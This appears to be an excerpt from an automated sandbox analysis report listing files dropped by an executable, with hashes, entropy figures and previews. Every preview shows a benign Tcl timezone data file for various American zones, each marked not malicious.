                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Merida) {.. {-9223372036854775808 -21508 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {407653200 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6705
                                                                                                                                                                                                                              Entropy (8bit):3.985641709481311
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4DCG0haiaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:42G0IiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:4999FE49C1640402CB432BC1EB667479
                                                                                                                                                                                                                              SHA1:2ED0044927A66856090793ED6E5FF634617C8C40
                                                                                                                                                                                                                              SHA-256:2574831391092AD44D7B2806EEF30D59CE3BAE872111917DD39EC51EFDD62E5F
                                                                                                                                                                                                                              SHA-512:39DE1D24037F3FFA3101BBAA885939074E596479F68013CDA9CE53A061EA704F63FB55C15B68B66B0E29E3F07ADC0BDC2D78A2D289277E75D2EF95F54988DB74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Metlakatla) {.. {-9223372036854775808 54822 0 LMT}.. {-3225223727 -31578 0 LMT}.. {-2188955622 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2261
                                                                                                                                                                                                                              Entropy (8bit):3.9546083289866267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5CBUBUI+n36fELf5On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:EB7qehpYtj
                                                                                                                                                                                                                              MD5:7A67EA7FF5AC0E9B088298007A9370F4
                                                                                                                                                                                                                              SHA1:531583F67E0C6ABA95B5A664A555BF40BF743CE8
                                                                                                                                                                                                                              SHA-256:E83DB749E6AA87FD56829C2810D0F93A4194E3EE2CB0BDC12114B1EF55E92E96
                                                                                                                                                                                                                              SHA-512:2C9035B415E36A769782FCFA15D79E5FEACA232439D1442407C8CD8C144EE9991030D9D58D2AD54CF6C0840BF78C81921B82BECBC74ABBD0DAC627F77772F52F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mexico_City) {.. {-9223372036854775808 -23796 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-975261600 -18000 1 CDT}.. {-963169200 -21600 0 CST}.. {-917114400 -18000 1 CDT}.. {-907354800 -21600 0 CST}.. {-821901600 -18000 1 CWT}.. {-810068400 -21600 0 CST}.. {-627501600 -18000 1 CDT}.. {-612990000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001836800 -21600 0 CST}.. {1014184800 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {10357020
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7080
                                                                                                                                                                                                                              Entropy (8bit):3.5379714312244217
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2UViR+iORv7bw1aW5AnMyxH5e+fHbxMfOp6D7bF8qMmqyiqV1mjZe7JhlgXY7FWN:02l5qJZS
                                                                                                                                                                                                                              MD5:C68889AA813C399939FCFA54E9CE0DFB
                                                                                                                                                                                                                              SHA1:F3D58D7BEFF2D1CB94FECE00C31FEF5BDF58C231
                                                                                                                                                                                                                              SHA-256:1B131AC968F95652667BD7EB1F6D667C8F679B31270D82B4B4271E787386CCCA
                                                                                                                                                                                                                              SHA-512:EBAF8210919E34668E9DDFCB546E5A62F35954957AAE956B6302BF296C7D4CF51E1B10FB13217CB3EEB430DAC246217EB4E9250CB4109C95D8A4367457D02771
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Miquelon) {.. {-9223372036854775808 -13480 0 LMT}.. {-1850328920 -14400 0 AST}.. {326001600 -10800 0 -03}.. {536468400 -10800 0 -02}.. {544597200 -7200 1 -02}.. {562132800 -10800 0 -02}.. {576046800 -7200 1 -02}.. {594187200 -10800 0 -02}.. {607496400 -7200 1 -02}.. {625636800 -10800 0 -02}.. {638946000 -7200 1 -02}.. {657086400 -10800 0 -02}.. {671000400 -7200 1 -02}.. {688536000 -10800 0 -02}.. {702450000 -7200 1 -02}.. {719985600 -10800 0 -02}.. {733899600 -7200 1 -02}.. {752040000 -10800 0 -02}.. {765349200 -7200 1 -02}.. {783489600 -10800 0 -02}.. {796798800 -7200 1 -02}.. {814939200 -10800 0 -02}.. {828853200 -7200 1 -02}.. {846388800 -10800 0 -02}.. {860302800 -7200 1 -02}.. {877838400 -10800 0 -02}.. {891752400 -7200 1 -02}.. {909288000 -10800 0 -02}.. {923202000 -7200 1 -02}.. {941342400 -10800 0 -02}.. {954651600 -7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10507
                                                                                                                                                                                                                              Entropy (8bit):3.8204583916930557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:X9+FPHyXFRsivcQYM+T7Z/xVQzxmtBWIXrObx29x8sLxcGMe++wzlrfFjxKvnpNM:gF6L0d0F2TzNc/1cYUH+CC
                                                                                                                                                                                                                              MD5:80B88F57B837CD2478815796618A6AC6
                                                                                                                                                                                                                              SHA1:CC2BE0213E9F0D3B307A8311D7A1013582E8A338
                                                                                                                                                                                                                              SHA-256:D977D045DE5CDAEB41189B91963E03EF845CA4B45E496649B4CB541EE1B5DD22
                                                                                                                                                                                                                              SHA-512:9410CBD706CAABFFF88DFF75235597D844B45A061EBD796F6708D7CEAB680273571A17935B7CCFC7C466ABF293C286D0886F47880E692F74C4E8BFB41729C73C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Moncton) {.. {-9223372036854775808 -15548 0 LMT}.. {-2715882052 -18000 0 EST}.. {-2131642800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1167595200 -14400 0 AST}.. {-1153681200 -10800 1 ADT}.. {-1145822400 -14400 0 AST}.. {-1122231600 -10800 1 ADT}.. {-1114372800 -14400 0 AST}.. {-1090782000 -10800 1 ADT}.. {-1082923200 -14400 0 AST}.. {-1059332400 -10800 1 ADT}.. {-1051473600 -14400 0 AST}.. {-1027882800 -10800 1 ADT}.. {-1020024000 -14400 0 AST}.. {-996433200 -10800 1 ADT}.. {-988574400 -14400 0 AST}.. {-965674800 -10800 1 ADT}.. {-955396800 -14400 0 AST}.. {-934743600 -10800 1 ADT}.. {-923947200 -14400 0 AST}.. {-904503600 -10800 1 ADT}.. {-891892800 -14400 0 AST}.. {-883598400 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):3.9628147491173964
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JZKy36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:XwDqehpYtj
                                                                                                                                                                                                                              MD5:4AE2B33D9DACE0E582FA456B361C50B7
                                                                                                                                                                                                                              SHA1:5D62287F072F3687EF130BB1A9DD97BB2ABCF91C
                                                                                                                                                                                                                              SHA-256:F5A66A403BF40BE7EAB188F3CEC8D7DB700F60084F7B856AB87E0AA4A0F2C0B6
                                                                                                                                                                                                                              SHA-512:39BE803FD47709A1120FC8E09DB9B294DE41F69C7DD86AAB03AD8D0878B160B21D82B16398125559B792DAE99D5D917AE466C536001FEC1E618B68ACA9A80322
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Monterrey) {.. {-9223372036854775808 -24076 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2936
                                                                                                                                                                                                                              Entropy (8bit):3.6410670126139046
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JgQkS4SaEcSyS0sZSUS2kSVSXSulSASX5kAXJMsCXrUari3akaWCa3M+lafpI6L:X5kH4c9GT0E01jm5keJMRXrUEi3akaWO
                                                                                                                                                                                                                              MD5:D78DEBC7C0B15B31635DDC34C49248BC
                                                                                                                                                                                                                              SHA1:DB2FF76DB3A79BE52E2DFD4C7B8B6592946772F9
                                                                                                                                                                                                                              SHA-256:214F97A3BCB2378CCE23D280EA6A3B691604F82E383628F666BE585BB8494932
                                                                                                                                                                                                                              SHA-512:E5FCD0B54F61910E70B1D0EE9911C5B4AFF850F16B651A01D69A63A97880913B0BAB99B0D864C4E613594734FA72CCA0E9607B1ADB6E75957C790990114FD0A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Montevideo) {.. {-9223372036854775808 -13491 0 LMT}.. {-1942690509 -13491 0 MMT}.. {-1567455309 -14400 0 -04}.. {-1459627200 -10800 0 -0330}.. {-1443819600 -12600 0 -0330}.. {-1428006600 -10800 1 -0330}.. {-1412283600 -12600 0 -0330}.. {-1396470600 -10800 1 -0330}.. {-1380747600 -12600 0 -0330}.. {-1141590600 -10800 1 -0330}.. {-1128286800 -12600 0 -0330}.. {-1110141000 -10800 1 -0330}.. {-1096837200 -12600 0 -0330}.. {-1078691400 -10800 1 -0330}.. {-1065387600 -12600 0 -0330}.. {-1047241800 -10800 1 -0330}.. {-1033938000 -12600 0 -0330}.. {-1015187400 -10800 1 -0330}.. {-1002488400 -12600 0 -0330}.. {-983737800 -10800 1 -0330}.. {-971038800 -12600 0 -0330}.. {-954707400 -10800 1 -0330}.. {-938984400 -12600 0 -0330}.. {-920838600 -10800 1 -0330}.. {-907534800 -12600 0 -0330}.. {-896819400 -10800 1 -0330}.. {-853621200 -9000 0 -03}.. {-84
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.748877320903638
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEzQ21h4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/290zQgp
                                                                                                                                                                                                                              MD5:9130CD86BD6417DB877BF9D8F3080CE1
                                                                                                                                                                                                                              SHA1:76C37982C37FE54ED539AC14B5A513817E42937C
                                                                                                                                                                                                                              SHA-256:97F48948EF5108FE1F42D548EA47C88D4B51BF1896EE92634C7ED55555B06DBD
                                                                                                                                                                                                                              SHA-512:EE036350AF95414392BD93DFF528F67D9A93EB192A30056ECBC3D2396AB4B2938B3C096C3EC2BC739294D4C4B7261C427B0AAEB9559F5381CB7F375892781820
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Montreal) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.878534808314885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zQ1HK90ppv:MByMYbpwt290zQ490b
                                                                                                                                                                                                                              MD5:CB5988A2508285B42C2BD487B8F9D6E1
                                                                                                                                                                                                                              SHA1:EAD740A566245B682CE5E284D389DFAE66DF05D9
                                                                                                                                                                                                                              SHA-256:6C3EE46983A3DAA91C9ADF4B18D6B4B80F1505B0057569B66D5B465D4C09B9C1
                                                                                                                                                                                                                              SHA-512:48796213A67F0E3BC56B54CE4D8BE098E74BA5808C9A1082D9381CB729ADFA2ACB9CE9E39A3244B3901405761C97AEE28D44C3BF7239ECC71175C62E152029C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Montserrat) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.785765433607229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwEzEeIAcGu:SlSWB9vsM3y7RQtHAIgpRQPN/290xzEf
                                                                                                                                                                                                                              MD5:F7DAD684104D917E0F29F6951EA627AC
                                                                                                                                                                                                                              SHA1:E57B5CA730D90C5865CF32FEC4872F71E033D21C
                                                                                                                                                                                                                              SHA-256:A889810B8BB42CD206D8F8961164AD03CCFBB1924D583075489F78AFA10EAF67
                                                                                                                                                                                                                              SHA-512:8284F2A357A32B2F5A211904F65E3B5C37B77C9BF38C85DFA0A95A73457F3076EC12F09BC767B4D0B8FC86BF69D01A17A7BF685BAB72F3E519A397D050DA0C3B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nassau) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11373
                                                                                                                                                                                                                              Entropy (8bit):3.8110553140357086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HeohzORhK1a8phYvNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:+uORhK1a8phYloSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:385C3BDD3E41E5E75CEF0658322B5CDE
                                                                                                                                                                                                                              SHA1:0334C21C8316ED2EE16FC98B1E8867D5E0916C00
                                                                                                                                                                                                                              SHA-256:7BA7DA179AA7DF26AC25E7ACCD9BD83784174445285A0D9CCBD7D6A9AA34F4BC
                                                                                                                                                                                                                              SHA-512:764B680FB8414B5AC8FB110247C19B1004A4453DD2BAC94BF3CFD80281FF3679A5B1D212238509165E022269503ED14A54B0EF73AF7014344752E6A627657D1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/New_York) {.. {-9223372036854775808 -17762 0 LMT}.. {-2717650800 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-1577905200 -18000 0 EST}.. {-1570381200 -14400 1 EDT}.. {-1551636000 -18000 0 EST}.. {-1536512400 -14400 1 EDT}.. {-1523210400 -18000 0 EST}.. {-1504458000 -14400 1 EDT}.. {-1491760800 -18000 0 EST}.. {-1473008400 -14400 1 EDT}.. {-1459706400 -18000 0 EST}.. {-1441558800 -14400 1 EDT}.. {-1428256800 -18000 0 EST}.. {-1410109200 -14400 1 EDT}.. {-1396807200 -18000 0 EST}.. {-1378659600 -14400 1 EDT}.. {-1365357600 -18000 0 EST}.. {-1347210000 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-123895440
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.799414617322291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwMueh4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/2905u+p
                                                                                                                                                                                                                              MD5:B01CC44E5139066F87ADFF16728B98BF
                                                                                                                                                                                                                              SHA1:4464E187AFF336C9137094308C270BB822974DF1
                                                                                                                                                                                                                              SHA-256:55C37BF1A579A22A790ADE6585CE95BEC02DA356E84D2EF7832C422A4484FF9D
                                                                                                                                                                                                                              SHA-512:A45166FFE444982593CBAC3E683D25D9EDB070DB6CD059A83D1C52099F409FFBFE6EA68D255AD000AF142BF8C8D100271531852263677184597877B7BF318847
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nipigon) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8680
                                                                                                                                                                                                                              Entropy (8bit):3.965662913874442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OrBvOs5vzC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:OrBvOsM9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:9A5F536932FED5A93E2C3DEB81960CD1
                                                                                                                                                                                                                              SHA1:8E78396D280DD3A9564CEFC7FB722437F3C4D003
                                                                                                                                                                                                                              SHA-256:8E971C9560CCE548B46626D072E62AB0F4C9682BF6A6ABFB4D0E8D63745402FE
                                                                                                                                                                                                                              SHA-512:60CFDBCE87F9CD7F27E071D66B97E60F62E56F413DC867BC809490B30D00045D0757710D6B5724148E2A28BD1E45FB662391820E6350D998002BF67B16776645
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nome) {.. {-9223372036854775808 46702 0 LMT}.. {-3225223727 -39698 0 LMT}.. {-2188947502 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1397
                                                                                                                                                                                                                              Entropy (8bit):3.78056049136398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5TenykFxCFbF3YCFE2FBCFDFr9CFaFPBCFoF2CFTFKCFDuF1CF2F1CFWFhCFGF3a:5quY9EmFYBosNZNW/bWsBzgCccq7JYN9
                                                                                                                                                                                                                              MD5:B4F4530FCE4BF5690042A2DA40413D56
                                                                                                                                                                                                                              SHA1:52D5F2102485F5B326C888A287ED83CA18833BBC
                                                                                                                                                                                                                              SHA-256:9011C76295E6B17CC1973876B497BEE21B9E6562FB25DF66140F811A1FFA9765
                                                                                                                                                                                                                              SHA-512:08CAF75226D190D9FF0AA62AD84B13F1BF9047338A690847DF5B448BDB731A877F3E186298AFD704F4F4E133FF3F3128B098F9D90AE9A8E726AE52F84A7DA2E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Noronha) {.. {-9223372036854775808 -7780 0 LMT}.. {-1767217820 -7200 0 -02}.. {-1206961200 -3600 1 -02}.. {-1191366000 -7200 0 -02}.. {-1175378400 -3600 1 -02}.. {-1159830000 -7200 0 -02}.. {-633823200 -3600 1 -02}.. {-622072800 -7200 0 -02}.. {-602287200 -3600 1 -02}.. {-591836400 -7200 0 -02}.. {-570751200 -3600 1 -02}.. {-560214000 -7200 0 -02}.. {-539128800 -3600 1 -02}.. {-531356400 -7200 0 -02}.. {-191368800 -3600 1 -02}.. {-184201200 -7200 0 -02}.. {-155167200 -3600 1 -02}.. {-150073200 -7200 0 -02}.. {-128901600 -3600 1 -02}.. {-121129200 -7200 0 -02}.. {-99957600 -3600 1 -02}.. {-89593200 -7200 0 -02}.. {-68421600 -3600 1 -02}.. {-57970800 -7200 0 -02}.. {499744800 -3600 1 -02}.. {511232400 -7200 0 -02}.. {530589600 -3600 1 -02}.. {540262800 -7200 0 -02}.. {562125600 -3600 1 -02}.. {571194000 -7200 0 -02}.. {592970400 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.8810445182855253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WEktwmGaLV911sF9A604qSScBgN+4ctDzIVQ/c/3hNxTh:WBwDPPA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:10AF9E9461DD03DA4F0AF0595EB36E6C
                                                                                                                                                                                                                              SHA1:57AC9BDE3AC665E49D9D2463A4BFA38C053A4A54
                                                                                                                                                                                                                              SHA-256:D0D8B108453265B60F525A4EC04DE9555087CD6AC5DDBA980B3A96CF0FCD68D1
                                                                                                                                                                                                                              SHA-512:B6DC7D2709A19B911E086C988DB8346F42DBF7601D9E51E3093C6AF897570E43E5F1C101FE88BC5251F3DCC3B532DB22FFE8A12A4D0151BC52AF3E6DDEA7D23A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
